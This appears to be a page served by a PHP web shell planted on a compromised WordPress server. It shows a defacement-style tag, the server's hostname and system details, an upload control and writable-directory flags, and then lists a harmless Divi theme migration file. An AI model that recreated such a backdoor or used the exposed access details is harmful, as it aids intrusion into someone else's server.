Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/store/wp-content/themes/Divi/includes/builder/module/settings/migration/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/store/wp-content/themes/Divi/includes/builder/module/settings/migration/DividerHeight.php
<?php

class ET_Builder_Module_Settings_Migration_DividerHeight extends ET_Builder_Module_Settings_Migration {

	public $version = '3.23.4';

	public function get_modules() {
		return array( 'et_pb_divider' );
	}

	public function get_fields() {
		return array(
			'height' => array(
				'affected_fields' => array(
					'height' => $this->get_modules(),
				),
			),
		);
	}

	public function migrate(
		$field_name,
		$current_value,
		$module_slug,
		$saved_value,
		$saved_field_name,
		$attrs,
		$content,
		$module_address
	) {
		// We need to sanitize only numeric values
		return is_numeric( $saved_value ) ? et_sanitize_input_unit( $saved_value, false, 'px' ) : $saved_value;
	}
}

return new ET_Builder_Module_Settings_Migration_DividerHeight();

Hry